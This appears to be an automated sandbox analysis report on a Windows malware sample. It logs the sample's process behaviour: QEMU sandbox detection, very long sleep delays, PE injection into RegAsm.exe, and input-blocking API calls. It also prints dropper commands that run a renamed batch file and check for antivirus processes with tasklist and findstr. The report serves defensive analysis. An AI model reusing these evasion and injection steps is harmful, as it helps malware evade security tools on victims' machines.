Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe, 0000001A.00000002.3204845308.000000000315E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.0000000002941000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE@\^Q
Source: RegAsm.exe, 0000001A.00000002.3204845308.000000000315E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.0000000002941000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE`,^Q
Source: RegAsm.exe, 0000001A.00000002.3204845308.000000000315E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.0000000002941000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE

Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Memory allocated: 2E90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Memory allocated: 3060000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Memory allocated: 2E90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Memory allocated: CD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Memory allocated: 2840000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Memory allocated: 4840000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif

Window / User API: threadDelayed 5110

Jump to behavior

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	API coverage: 4.6 %

Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif TID: 7548	Thread sleep time: -51100s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe TID: 2088	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe TID: 1608	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif

Thread sleep count: Count: 5110 delay: -10

Jump to behavior

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Code function: 0_2_00405B98 FindFirstFileW,FindClose,	0_2_00405B98
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Code function: 0_2_00406559 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406559
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Code function: 0_2_004029F1 FindFirstFileW,	0_2_004029F1
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00374005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_00374005
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	18_2_0037C2FF
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037494A GetFileAttributesW,FindFirstFileW,FindClose,	18_2_0037494A
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037CD14 FindFirstFileW,FindClose,	18_2_0037CD14
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	18_2_0037CD9F
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0037F5D8
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0037F735
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	18_2_0037FA36
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00373CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_00373CE2
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00374005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_00374005
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	20_2_0037C2FF
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037494A GetFileAttributesW,FindFirstFileW,FindClose,	20_2_0037494A
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037CD14 FindFirstFileW,FindClose,	20_2_0037CD14
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	20_2_0037CD9F
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_0037F5D8
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_0037F735
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	20_2_0037FA36
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00373CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_00373CE2

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00325D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

18_2_00325D13

Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\684126\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\684126	Jump to behavior

Source: RegAsm.exe, 0000001A.00000002.3204845308.000000000315E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.0000000002941000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe`,^q
Source: RegAsm.exe, 0000001A.00000002.3204845308.000000000315E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.0000000002941000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: RegAsm.exe, 0000001A.00000002.3204845308.000000000315E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.0000000002941000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe@\^q

Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_003845D5 BlockInput,

18_2_003845D5

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00325240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

18_2_00325240

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00345CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

18_2_00345CAC

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Code function: 0_2_00405BBF GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405BBF

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_003688CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

18_2_003688CD

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0033A354 SetUnhandledExceptionFilter,	18_2_0033A354
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0033A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_0033A385
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0033A354 SetUnhandledExceptionFilter,	20_2_0033A354
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0033A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_0033A385

Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Memory written: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe base: 1100000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Memory written: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe base: 900000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Memory written: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe base: 1100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Memory written: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe base: FF4000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Memory written: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe base: 900000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Memory written: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe base: 650000	Jump to behavior

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00369369 LogonUserW,

18_2_00369369

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00325240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

18_2_00325240

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00371AC6 SendInput,keybd_event,

18_2_00371AC6

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_003751E2 mouse_event,

18_2_003751E2

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 684126	Jump to behavior
